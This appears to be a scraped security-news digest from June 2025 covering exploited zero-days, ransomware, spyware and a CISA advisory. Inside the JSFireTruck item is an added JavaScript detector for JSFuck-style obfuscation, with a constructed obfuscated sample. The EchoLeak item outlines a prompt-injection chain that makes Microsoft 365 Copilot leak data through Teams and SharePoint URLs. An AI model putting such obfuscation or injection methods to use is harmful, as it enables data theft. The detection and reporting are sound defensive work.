News

Week in review: Microsoft fixes exploited zero-day, Mirai botnets target unpatched Wazuh servers

exploits
2025-06-15 https://www.helpnetsecurity.com/2025/06/15/week-in-review-microsoft-fixes-exploited-zero-day-mirai-botnets-target-unpatched-wazuh-servers/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos:
Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053). For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053).
Unpatched Wazuh servers targeted by Mirai botnets (CVE-2025-24016). Two Mirai botnets are exploiting a critical remote code execution vulnerability (CVE-2025-24016) in the open-source Wazuh XDR/SIEM platform, Akamai researchers have warned.
Want fewer security …

The post Week in review: Microsoft fixes exploited zero-day, Mirai botnets target unpatched Wazuh servers appeared first on Help Net Security.


Autosummary: New infosec products of the week: June 13, 2025. Here’s a look at the most interesting products from the past week, featuring releases from Contrast Security, Cymulate, Lemony, SpecterOps, Thales, and Vanta.
Unpacking the security complexity of no-code development platforms. In this Help Net Security interview, Amichai Shulman, CTO at Nokod Security, discusses how the abstraction layer in no-code environments complicates security by obscuring data flow, identity propagation, and control logic.
AI forces IT leaders to rethink their network strategies. As AI assistants, agents, and data-driven workloads reshape how work gets done, they’re creating more latency-sensitive and more complex network traffic, according to Cisco.


Kali Linux 2025.2 delivers Bloodhound CE, CARsenal, 13 new tools

Linux
2025-06-14 https://www.helpnetsecurity.com/2025/06/14/kali-linux-2025-2-released-bloodhound-ce-carsenal/

OffSec has released Kali Linux 2025.2, the most up-to-date version of the widely used penetration testing and digital forensics platform. (Figure: KDE Plasma 6.3 in Kali Linux 2025.2. Source: OffSec.) New in Kali Linux 2025.2: as usual, the newest Kali version comes with new community wallpapers and new versions of the KDE Plasma and GNOME graphical desktop environments. This time around, the Kali Menu is new as well: it has been reorganized to follow the …




WestJet investigates cyberattack disrupting internal systems

ciber
2025-06-14 https://www.bleepingcomputer.com/news/security/westjet-investigates-cyberattack-disrupting-internal-systems/
WestJet, Canada’s second-largest airline, is investigating a cyberattack that has disrupted access to some internal systems as it responds to the breach. [...]



Anubis ransomware adds wiper to destroy files beyond recovery

exploits ransomware
2025-06-14 https://www.bleepingcomputer.com/news/security/anubis-ransomware-adds-wiper-to-destroy-files-beyond-recovery/

Autosummary: (Figure: files before encryption, top, and after, bottom. Source: Trend Micro.) Trend Micro’s analysis reveals that Anubis supports several commands at launch, including for privilege elevation, directory exclusion, and target paths for encryption.


Unusual toolset used in recent Fog Ransomware attack

exploits ransomware
2025-06-14 https://securityaffairs.com/178969/malware/unusual-toolset-used-in-recent-fog-ransomware-attack.html
Fog ransomware operators used unusual pentesting and monitoring tools in a May 2025 attack, Symantec researchers warn. In May 2025, attackers hit an Asian financial firm with Fog ransomware, using rare tools such as the Syteca monitoring software and the pentesting tools GC2, Adaptix, and Stowaway. Symantec researchers pointed out that the use of these tools is unusual […]

Autosummary: Pierluigi Paganini, June 14, 2025. Fog ransomware operators used unusual pentesting and monitoring tools in a May 2025 attack, Symantec researchers warn.


Security flaws in government apps go unpatched for years

government
2025-06-13 https://www.helpnetsecurity.com/2025/06/13/public-sector-software-vulnerabilities/

78% of public sector organizations are operating with significant security debt, flaws left unaddressed for more than a year, according to Veracode. 55% are burdened with ‘critical’ security debt, representing long-standing vulnerabilities with severe risk potential. (Figure: public sector flaw remediation timeline based on survival analysis. Source: Veracode.) Public sector security debt exceeds the industry average: the research reveals that public sector entities require an average of 315 days to fix half their software vulnerabilities, significantly higher …


Autosummary: The report identifies five key metrics that measure an organization’s application security maturity and debt management capability, revealing distinct performance gaps between leading and lagging public sector organizations. Flaw prevalence: leading agencies have flaws in fewer than 33% of applications, while lagging agencies show flaws in 100% of their applications.


Apple Zero-Click Flaw in Messages Exploited to Spy on Journalists Using Paragon Spyware

exploits
2025-06-13 https://thehackernews.com/2025/06/apple-zero-click-flaw-in-messages.html
Apple has disclosed that a now-patched security flaw present in its Messages app was actively exploited in the wild to target civil society members in sophisticated cyber attacks. The vulnerability, tracked as CVE-2025-43200, was addressed on February 10, 2025, as part of iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1.

Autosummary: Over the past two years, Predator operators have been flagged in over a dozen countries, including Angola, Armenia, Botswana, the Democratic Republic of the Congo, Egypt, Indonesia, Kazakhstan, Mongolia, Mozambique, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. The vulnerability, tracked as CVE-2025-43200, was addressed on February 10, 2025, as part of iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1.


Trend Micro fixes critical bugs in Apex Central and TMEE PolicyServer

exploits
2025-06-13 https://securityaffairs.com/178952/security/trend-micro-fixes-critical-bugs-in-apex-central-and-tmee-policyserver.html
Trend Micro fixed multiple vulnerabilities that impact its Apex Central and Endpoint Encryption (TMEE) PolicyServer products, addressing remote code execution and authentication bypass flaws in both. Trend Micro Endpoint Encryption PolicyServer is a centralized management server used in Trend Micro’s Endpoint Encryption solution. It acts […]

Autosummary: CVE-2025-49216 (CVSS score 9.8), Authentication Bypass Vulnerability: an authentication bypass vulnerability in the Trend Micro Endpoint Encryption PolicyServer could allow an attacker to access key methods as an admin user and modify product configurations on affected installations. The company fixed the following flaws in Apex Central: CVE-2025-49219 (CVSS score 9.8), Deserialization of Untrusted Data RCE Vulnerability. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability.


Victoria’s Secret restores critical systems after cyberattack

ciber
2025-06-13 https://www.bleepingcomputer.com/news/security/victorias-secret-restores-critical-systems-after-cyberattack/
Victoria’s Secret has restored all critical systems impacted by a May 24 security incident that forced it to shut down corporate systems and the e-commerce website. [...]

Autosummary: Quarterly earnings release delayed. As the company revealed after disclosing the incident last month, it was forced to take down corporate systems, some in-store services, and the e-commerce website as a precaution on May 26.


Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion

exploits
2025-06-13 https://thehackernews.com/2025/06/ransomware-gangs-exploit-unpatched.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday disclosed that ransomware actors are targeting unpatched SimpleHelp Remote Monitoring and Management (RMM) instances to compromise customers of an unnamed utility billing software provider. "This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp

Autosummary: The agency has outlined the following mitigations that organizations, including third-party service providers that use SimpleHelp to connect to downstream customers, can implement to better respond to the ransomware activity:
- Identify and isolate SimpleHelp server instances from the internet and update them to the latest version
- Notify downstream customers and instruct them to take actions to secure their endpoints
- Conduct threat hunting for indicators of compromise and monitor for unusual inbound and outbound traffic from the SimpleHelp server (for downstream customers)
- Disconnect affected systems from the internet if they have been encrypted by ransomware, reinstall the operating system, and restore data from a clean backup
- Maintain periodic clean, offline backups
- Refrain from exposing remote services such as Remote Desktop Protocol (RDP) on the web
CISA said it does not encourage victims to pay ransoms, as there is no guarantee that the decryptor provided by the threat actors will recover the files. According to Trend Micro, as of April 2025, the Fog threat actors have claimed 100 victims on their data leak site since the start of the year, with the majority of victims in the technology, education, manufacturing, and transportation sectors.


Apple confirmed that Messages app flaw was actively exploited in the wild

exploits
2025-06-13 https://securityaffairs.com/178962/mobile-2/apple-confirmed-messages-app-flaw-actively-exploited.html
Apple confirmed that a now-patched security flaw in its Messages app, tracked as CVE-2025-43200, was actively exploited in the wild to target journalists with Paragon’s Graphite spyware. The IT giant addressed the flaw […]

Autosummary: The IT giant addressed the flaw CVE-2025-43200 on February 10, 2025, with the release of iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1.


Discord flaw lets hackers reuse expired invites in malware campaign

exploits
2025-06-13 https://www.bleepingcomputer.com/news/security/discord-flaw-lets-hackers-reuse-expired-invites-in-malware-campaign/
Hackers are hijacking expired or deleted Discord invite links to redirect users to malicious sites that deliver remote access trojans and information-stealing malware. [...]

Autosummary: Its capabilities include file operations, keylogging, and webcam/microphone access. Skuld Stealer: delivered as "skul.exe," this is an info-stealer that targets browser credentials, cookies, Discord tokens, and cryptocurrency wallet data (it injects JS to steal mnemonic phrases and passwords, exfiltrating them through Discord webhooks). ChromeKatz:


Your Meta AI chats might be public, and it’s not a bug

exploits
2025-06-13 https://www.malwarebytes.com/blog/news/2025/06/your-meta-ai-chats-might-be-public-and-its-not-a-bug
Users of Meta AI seem to be sharing their sensitive conversations with the entire world without being aware of it.

Autosummary: Similar to ChatGPT, Meta AI can generate text, answer questions, and help users plan, brainstorm, and strategize on various issues. WhatsApp, Facebook, and Instagram. Note: conversations with Meta AI on WhatsApp are not protected by end-to-end encryption and may be used for AI training. To limit Meta’s use of your data for AI training, go to Settings & Privacy > Privacy Center. Deleting AI conversation data: Meta has introduced commands to delete information shared in any chat with an AI; for example, type /reset-ai in a conversation on Messenger, Instagram, or WhatsApp to delete your AI messages.


Bert ransomware: what you need to know

exploits ransomware
2025-06-13 https://www.fortra.com/blog/bert-ransomware-what-you-need-know
Bert is a recently-discovered strain of ransomware that encrypts victims’ files and demands a payment for the decryption key. Read more in my article on the Fortra blog.

Autosummary: As Cybernews describes, data exfiltrated from S5 Agency World includes details of invoices, email correspondence, inspection reports, employees’ COVID-19 vaccinations, copies of passports, and internal corporate documents. In recent weeks Bert has claimed to have stolen information from organisations around the world, including a ticket company, a Turkish hospital, an American electronics firm, a Malaysian construction firm, a Colombian IT solutions business, and a Taiwanese company producing equipment for semiconductors.


Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

exploits
2025-06-13 https://thehackernews.com/2025/06/over-269000-websites-infected-with.html
Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections. According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code.

Autosummary: "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said.
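As an added example (not code from the Unit 42 report or from the campaign itself), a small scorer for the obfuscation style described above: it measures what fraction of a script's non-whitespace characters come from the symbol set [, ], +, $, {, } and the longest unbroken run of those symbols, and flags scripts that exceed both thresholds. The thresholds and both sample scripts are constructed for illustration, not taken from an infected site. coercionDemo() uses the classic JSFuck alphabet (which also includes ! and parentheses) to show why such a tiny alphabet still evaluates to ordinary strings.

```javascript
// Added example, not code from the Unit 42 report: score scripts by how much
// of them is built from the JSFireTruck symbol set described in the article.
const JSFIRETRUCK_SYMBOLS = new Set(["[", "]", "+", "$", "{", "}"]);

// Fraction of non-whitespace characters drawn from the symbol set.
function symbolRatio(source) {
  let total = 0;
  let hits = 0;
  for (const ch of source) {
    if (/\s/.test(ch)) continue;
    total += 1;
    if (JSFIRETRUCK_SYMBOLS.has(ch)) hits += 1;
  }
  return total === 0 ? 0 : hits / total;
}

// Longest unbroken run of symbol-set characters, whitespace ignored.
// Ordinary code never strings dozens of these together; the obfuscator does.
function longestSymbolRun(source) {
  let best = 0;
  let run = 0;
  for (const ch of source) {
    if (/\s/.test(ch)) continue;
    run = JSFIRETRUCK_SYMBOLS.has(ch) ? run + 1 : 0;
    if (run > best) best = run;
  }
  return best;
}

// Thresholds are assumptions chosen for illustration, not values from the report.
function looksLikeJsFireTruck(source, { minRatio = 0.7, minRun = 40 } = {}) {
  return symbolRatio(source) >= minRatio && longestSymbolRun(source) >= minRun;
}

// Why a tiny alphabet is enough: JavaScript coercion turns bracket/plus/bang
// expressions back into ordinary values. (![]+[]) is the string "false" and
// +!![] is the number 1, so indexing yields the letter "a". This uses the
// classic JSFuck alphabet, which also includes "!" and parentheses.
function coercionDemo() {
  return (![] + [])[+!![]]; // "a"
}

// Constructed samples (not captured from an infected site).
const BENIGN_SCRIPT = 'function greet(name) { return "Hello, " + name; }';
const SUSPICIOUS_SCRIPT = "$={};$$=[];" + "[[]+{}+$$+[]+$]".repeat(10) + ";$$[+[]]();";

function scoreSamples() {
  return {
    benign: looksLikeJsFireTruck(BENIGN_SCRIPT),         // false
    suspicious: looksLikeJsFireTruck(SUSPICIOUS_SCRIPT), // true
  };
}
```

The ratio alone is not enough: a minified script can be dense in brackets and braces for legitimate reasons, so the run length is what separates an obfuscator that spells out every string from bracket-heavy but ordinary code. Tune both thresholds against a corpus of your own site's scripts before using this as a blocking rule.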


Paraguay Suffered Data Breach: 7.4 Million Citizen Records Leaked on Dark Web

financial
2025-06-13 https://securityaffairs.com/178970/data-breach/paraguay-suffered-data-breach-7-4-million-citizen-records-leaked-on-dark-web.html
Resecurity researchers found 7.4 million records containing personally identifiable information (PII) of Paraguayan citizens leaked on the dark web. Last week, cybercriminals offered information about all citizens of Paraguay for sale, demanding $7.4 million in […]

Autosummary: The second affected the Ministry of Finance, the Central Bank of Paraguay, and Itaipú, where a file containing over 17,000 records was made public, including sensitive data such as payments to public officials, salaries, full names, and ID numbers. These events, with a “hack-and-leak” narrative, could be interpreted as a landmark among known cybersecurity incidents today, by size and scale, as the entire country was extorted due to a massive data breach.


A cyberattack on United Natural Foods caused bread shortages and bare shelves

ciber
2025-06-13 https://securityaffairs.com/178991/hacking/a-cyberattack-on-united-natural-foods-caused-bread-shortages-and-bare-shelves.html
A cyberattack on United Natural Foods Inc. (UNFI) disrupted deliveries, causing Whole Foods shortages nationwide after systems were taken offline on June 5. UNFI is a Providence, Rhode Island–based natural and organic food company and the largest publicly traded wholesale distributor of health and specialty food in the United States and Canada. It is Whole Foods Market’s main supplier, with their traffic making up over […]

Autosummary: “A corporate Whole Foods spokesperson apologized for the inconvenience and said the company is working to restock shelves quickly, but declined to answer specific questions,” reported NBC News.


44% of mobile users encounter scams every day

financial
2025-06-12 https://www.helpnetsecurity.com/2025/06/12/mobile-users-scams/

Nearly half of mobile users encounter mobile scams daily, with people in the US and UK more likely to be targeted than those in other regions, according to Malwarebytes. Most users say it’s hard to tell a scam from something real, and very few feel confident in spotting one. Younger generations, like Gen Z and Millennials, are the most exposed: they’re more likely to see scams regularly compared to older users. No channel is …


Autosummary: No channel is safe. Scams and malware now hit through every channel: calls, texts, emails, and even apps. Gen Z hit hardest by extortion scams. 74% of mobile users have encountered social engineering scams, and one in three have fallen victim, illustrating how effective scammers are at exploiting human trust.


Cybercriminals are turning stolen data into a thriving black market

ciber
2025-06-12 https://www.helpnetsecurity.com/2025/06/12/europol-internet-organised-crime-threat-assessment-iocta-2025/

Cybercriminals are stealing data and running full-scale businesses around it. Europol’s latest Internet Organised Crime Threat Assessment (IOCTA) report reveals how personal data is now a core currency in the underground economy. Data is the product. Cybercriminals go after everything from login credentials to credit card numbers, medical records, and social media accounts. The data criminals collect helps them access accounts, impersonate users, or sell that access to others. Europol stresses that access to an …


Autosummary: AI opens new attack paths. Besides improving phishing, criminals are using AI to create fake identities, forge digital fingerprints, and bypass security checks. Infostealers are a type of malware designed to extract personal data from infected devices, such as usernames, passwords, and browser history.


Fog ransomware attack uses unusual mix of legitimate and open-source tools

exploits ransomware
2025-06-12 https://www.bleepingcomputer.com/news/security/fog-ransomware-attack-uses-unusual-mix-of-legitimate-and-open-source-tools/
Fog ransomware hackers are using an uncommon toolset, which includes open-source pentesting utilities and a legitimate employee monitoring software called Syteca. [...]

Autosummary: Apart from these tools, Symantec also lists the following as part of Fog ransomware’s latest arsenal:
- Adapt2x C2: open-source alternative to Cobalt Strike supporting post-exploitation actions
- Process Watchdog: system monitoring utility that can restart key processes
- PsExec: Microsoft Sysinternals tool for remote execution across networked machines
- Impacket SMB: Python library with low-level programmatic access to SMB, likely used for deploying the ransomware payload on the victim’s machines


Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data Without User Interaction

exploits
2025-06-12 https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html
A novel attack technique named EchoLeak has been characterized as a "zero-click" artificial intelligence (AI) vulnerability that allows bad actors to exfiltrate sensitive data from Microsoft 365 Copilot’s context without any user interaction. The critical-rated vulnerability has been assigned the CVE identifier CVE-2025-32711 (CVSS score: 9.3). It requires no customer action and has been already

Autosummary: Make way for the MCP rebinding attack. The rapid ascent of MCP as the "connective tissue for enterprise automation and agentic applications" has also opened up new attack avenues, such as Domain Name System (DNS) rebinding, to access sensitive data by exploiting Server-Sent Events (SSE), a protocol used by MCP servers for real-time streaming communication to MCP clients. The EchoLeak chain has two stages. Scope violation: Copilot’s Retrieval-Augmented Generation (RAG) engine mixes untrusted, attacker-supplied input with sensitive data in the LLM context. Retrieval: Copilot leaks the sensitive data to the attacker via Microsoft Teams and SharePoint URLs. "As a zero-click AI vulnerability, EchoLeak opens up extensive opportunities for data exfiltration and extortion attacks for motivated threat actors," Aim Security said.


U.S. CISA adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-06-12 https://securityaffairs.com/178923/security/u-s-cisa-adds-wazuh-and-webdav-flaws-to-its-known-exploited-vulnerabilities-catalog.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Wazuh and WebDAV flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: This week, Akamai researchers warned that […]

Autosummary: Pierluigi Paganini, June 12, 2025. Below are the descriptions for these flaws:
- CVE-2025-24016 (CVSS score 9.9): Wazuh Server Deserialization of Untrusted Data Vulnerability
- CVE-2025-33053 (CVSS score 8.8): Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability
This week, Akamai researchers warned that multiple Mirai botnets exploit the critical remote code execution vulnerability CVE-2025-24016 (CVSS score of 9.9) affecting Wazuh servers.


LockBit panel data leak shows Chinese orgs among the most targeted

ransomware
2025-06-12 https://www.helpnetsecurity.com/2025/06/12/lockbit-data-leak-targets-ransoms/

The LockBit ransomware-as-a-service (RaaS) operation has netted around $2.3 million USD within 5 months, the data leak stemming from the May 2025 hack of a LockBit affiliate panel has revealed. From that sum, the operators took their 20% cut (approximately USD 456,000), and they additionally “earned” some $10,000-$11,000 USD from affiliates that registered through the panel. “What this leak truly shows is the complex and ultimately less glamorous reality of their illicit ransomware activities. While …


Autosummary: Insights from the LockBit data leak. The data leak, which Trellix researchers believe comes from the database behind LockBit’s “Lite” affiliates admin panel, encompasses data from December 18, 2024 to April 29, 2025, and contains details on LockBit ransomware affiliates, victim organizations, chat logs, cryptocurrency wallets and ransomware build configurations.


Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider

exploits
2025-06-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025.

SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including CVE-2024-57727, a path traversal vulnerability [1]. Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers’ unpatched SimpleHelp RMM for disruption of services in double extortion compromises [1].

CISA added CVE-2024-57727 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 13, 2025.

CISA urges software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.


Mitigations

CISA

Autosummary: [1] Anthony Bradshaw et al., “DragonForce Actors Target SimpleHelp Vulnerabilities to Attack MSP, Customers,” Sophos News, May 27, 2025, https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/. [2] Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favor by CISA.
SimpleHelp endpoints: determine whether an endpoint is running the remote access service (RAS) by checking the following paths, depending on the specific environment:
- Windows: %APPDATA%\JWrapper-Remote Access
- Linux: /opt/JWrapper-Remote Access
- macOS: /Library/Application Support/JWrapper-Remote Access
If a RAS installation is present and running, open the serviceconfig.xml file in <file_path>/JWrapper-Remote Access/JWAppsSharedConfig/ to determine whether the registered service is vulnerable.


WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network

financial
2025-06-12 https://thehackernews.com/2025/06/wordpress-sites-turned-weapon-how.html
The threat actors behind the VexTrio Viper Traffic Distribution Service (TDS) have been linked to other TDS services like Help TDS and Disposable TDS, indicating that the sophisticated cybercriminal operation is a sprawling enterprise of its own that’s designed to distribute malicious content. "VexTrio is a group of malicious adtech companies that distribute scams and harmful software via

Autosummary: "These scripts redirect site visitors to various scam pages through traffic broker networks associated with VexTrio, one of the largest known cybercriminal affiliate networks that leverages sophisticated DNS techniques, traffic distribution systems, and domain generation algorithms to deliver malware and scams across global networks," GoDaddy noted in a report published in March 2025.


Paragon Graphite Spyware used a zero-day exploit to hack at least two journalists’ iPhones

exploits
2025-06-12 https://securityaffairs.com/178940/mobile-2/paragon-graphite-spyware-used-a-zero-day-exploit.html
Security researchers at Citizen Lab revealed that Paragon’s Graphite spyware can hack fully updated iPhones via zero-click attacks. Citizen Lab has confirmed that Paragon’s Graphite spyware was used to hack fully updated iPhones, targeting at least two journalists in Europe. The group found forensic evidence showing the phones had communicated with the same spyware server. […]

Autosummary: Pierluigi Paganini, June 12, 2025. On June 5, 2025, Italy’s intelligence oversight committee (COPASIR) confirmed the government used Paragon’s Graphite spyware to spy on Luca Casarini and Dr. Beppe Caccia, but couldn’t determine who targeted journalist Mr. Cancellato.


Malware attack disguises itself as DeepSeek installer

exploits
2025-06-12 https://grahamcluley.com/malware-attack-disguises-itself-as-deepseek-installer/
Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legitimate installer for DeepSeek.



The path to better cybersecurity isn’t more data, it’s less noise

ciber
2025-06-11 https://www.helpnetsecurity.com/2025/06/11/cybersecurity-data-overload/

In cybersecurity, there’s an urge to collect as much data as possible. Logs, alerts, metrics, everything. But more data doesn’t necessarily translate to better security. SOCs deal with tens of thousands of alerts every day. It’s more than any person can realistically keep up with. When too much data comes in at once, things get missed. Responses slow down and, over time, the constant pressure can lead to burnout. According to a Vectra AI survey, …


Autosummary: What AI does well: processes data faster than humans; reduces alert fatigue by flagging high-risk patterns; finds anomalies that may be missed in manual reviews. What to watch out for: AI can still miss or misclassify threats; results depend on the quality of input data; human oversight and tuning are essential. AI is not magic. According to a Vectra AI survey, 71% of SOC practitioners worry they will miss a real attack buried in a flood of alerts, and 51% believe they cannot keep pace with the increasing number of security threats. If a security incident happens, take time to review which logs and alerts helped find or stop the threat.


OWASP Nettacker: Open-source scanner for recon and vulnerability assessment

exploits
2025-06-11 https://www.helpnetsecurity.com/2025/06/11/owasp-nettacker-open-source-scanner/

OWASP Nettacker is a free, open-source tool designed for network scanning, information gathering, and basic vulnerability assessment. Built and maintained by the OWASP community, Nettacker helps security pros automate common tasks like port scanning, service detection, and brute-force attacks. It offers a controlled and extensible framework for running these tests. What it does: Nettacker scans networks to find weaknesses. It maps out live hosts, open ports, services, and basic misconfigurations. It can also run some …


Autosummary: Future plans and download. “We are working on releasing the next version, 0.4.1, very soon, which will include the new custom wordlist feature and several new modules. Future plans include improvements in performance and multi-threading, an improved WebUI (including the introduction of a dashboard), a workflow feature, and integrations with other tools,” Stepanyan explained.


Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild

exploits
2025-06-11 https://thehackernews.com/2025/06/microsoft-patches-67-vulnerabilities.html
Microsoft has released patches to fix 67 security flaws, including one zero-day bug in Web Distributed Authoring and Versioning (WEBDAV) that it said has come under active exploitation in the wild. Of the 67 vulnerabilities, 11 are rated Critical and 56 are rated Important in severity. This includes 26 remote code execution flaws, 17 information disclosure flaws, and 14 privilege escalation

Autosummary: Other vulnerabilities of note include elevation of privilege flaws in the Common Log File System Driver (CVE-2025-32713, CVSS score: 7.8), Windows Netlogon (CVE-2025-33070, CVSS score: 8.1), and the Windows SMB Client (CVE-2025-33073, CVSS score: 8.8), as well as a critical unauthenticated RCE vulnerability in the Windows KDC Proxy Service (CVE-2025-33071, CVSS score: 8.1). The company said it also observed the threat actor leveraging several previously undocumented tools, such as:
- Credential Dumper, which targets an already-compromised Domain Controller to steal Active Directory and Domain Controller credential-related files
- Passive backdoor, which listens for incoming requests and executes shellcode payloads
- Keylogger, a custom C++ tool that records all keystrokes and writes them to a file under "C:/windows/temp/~TN%LogName%.tmp"
The keylogger notably lacks any C2 mechanism, meaning that it likely works in conjunction with another component that can exfiltrate the file to the attackers. Microsoft, however, is not affected by CVE-2025-4275 (aka Hydroph0bia), another Secure Boot bypass vulnerability present in an InsydeH2O UEFI application that allows digital certificate injection through an unprotected NVRAM variable ("SecureFlashCertData"), resulting in arbitrary code execution at the firmware level.


Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053)

exploits
2025-06-11 https://www.helpnetsecurity.com/2025/06/11/microsoft-fixes-zero-day-exploited-for-cyber-espionage-cve-2025-33053/

For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053). Also, Adobe Commerce and Magento Open Source users are urged to update quickly. About CVE-2025-33053 CVE-2025-33053 is a remote code execution vulnerability in Web Distributed Authoring and Versioning (WebDAV), which is a protocol for extending HTTP protocol functionality for interacting with files. Flagged by Check Point researchers, the vulnerability has been exploited in March 2025 to … More

The post Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053) appeared first on Help Net Security.

"

Autosummary: Among the vulnerabilities that are more likely to be exploited are: CVE-2025-33070, a Windows Netlogon vulnerability that could allow attackers to gain domain administrator privileges by sending specially crafted authentication requests to the domain controller; CVE-2025-47162, CVE-2025-47164 and CVE-2025-47167, RCE flaws in Microsoft Office (that have yet to be fixed in Microsoft 365 Apps for Enterprise); CVE-2025-32717, a Microsoft Word RCE vulnerability that could be exploited via a malicious RTF file, which the victim would open or just view in the preview pane; and CVE-2025-33071, a use-after-free flaw in Windows KDC Proxy Service (KPSSVC), which could allow an unauthenticated attacker to execute code over a network. "


INTERPOL Dismantles 20,000+ Malicious IPs Linked to 69 Malware Variants in Operation Secure

exploits
2025-06-11 https://thehackernews.com/2025/06/interpol-dismantles-20000-malicious-ips.html
INTERPOL on Wednesday announced the dismantling of more than 20,000 malicious IP addresses or domains that have been linked to 69 information-stealing malware variants. The joint action, codenamed Operation Secure, took place between January and April 2025, and involved law enforcement agencies from 26 countries to identify servers, map physical networks, and execute targeted takedowns. "These "

Autosummary: Countries involved in Operation Secure include Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, South Korea, Sri Lanka, Thailand, Timor-Leste, Tonga, Vanuatu, and Vietnam. "


Over 80,000 servers hit as Roundcube RCE bug gets rapidly exploited

exploits
2025-06-11 https://securityaffairs.com/178887/hacking/over-80000-servers-hit-as-roundcube-rce-bug-gets-rapidly-exploited.html
A critical remote code execution (RCE) vulnerability in Roundcube was exploited days after patch, impacting over 80,000 servers. Threat actors exploited a critical remote code execution (RCE) flaw in Roundcube, tracked as CVE-2025-49113, just days after the patch was released, targeting over 80,000 servers. Roundcube is a popular webmail platform and has been repeatedly targeted […] "

Autosummary: Firsov estimates that the flaw impacts over 53 million hosts (including tools like cPanel, Plesk, ISPConfig, DirectAdmin, etc.); he said that details and a PoC will be published soon. "


Hackers exploited Windows WebDav zero-day to drop malware

exploits
2025-06-11 https://www.bleepingcomputer.com/news/security/stealth-falcon-hackers-exploited-windows-webdav-zero-day-to-drop-malware/
An APT hacking group known as "Stealth Falcon" exploited a Windows WebDav RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, Egypt, and Yemen. [...] "

Autosummary: The loader then drops the primary payload, "Horus Agent," a custom C++ Mythic C2 implant that supports command execution for system fingerprinting, config changes, shellcode injection, and file operations. "


Operation Secure disrupts global infostealer malware operations

exploits
2025-06-11 https://www.bleepingcomputer.com/news/security/operation-secure-disrupts-global-infostealer-malware-operations/
An international law enforcement action codenamed "Operation Secure" targeted infostealer malware infrastructure in a massive crackdown across 26 countries, resulting in 32 arrests, data seizures, and server takedowns. [...] "

Autosummary: The results of Operation Secure are significant: over 20,000 malicious IPs/domains linked to infostealers were taken down; 41 servers supporting infostealer operations were seized; 32 suspects were arrested; 100 GB of data was confiscated; and 216,000 victims were notified. The authorities also identified a large cluster of 117 servers in Hong Kong that were used as command-and-control (C2) infrastructure for phishing, online fraud, and social media scam operations. "


Erie Insurance confirms cyberattack behind business disruptions

ciber
2025-06-11 https://www.bleepingcomputer.com/news/security/erie-insurance-confirms-cyberattack-behind-business-disruptions/
Erie Insurance and Erie Indemnity Company have disclosed that a weekend cyberattack is behind the recent business disruptions and platform outages on its website. [...] "

Autosummary: Error shown when attempting to log into the Erie Insurance site. Today, Erie Indemnity Group filed a Form 8-K with the U.S. Securities and Exchange Commission, stating it detected "unusual network activity" on June 7, 2025. "


US airline industry quietly selling flight data to DHS

industry
2025-06-11 https://www.malwarebytes.com/blog/news/2025/06/us-airline-industry-quietly-selling-flight-data-to-dhs
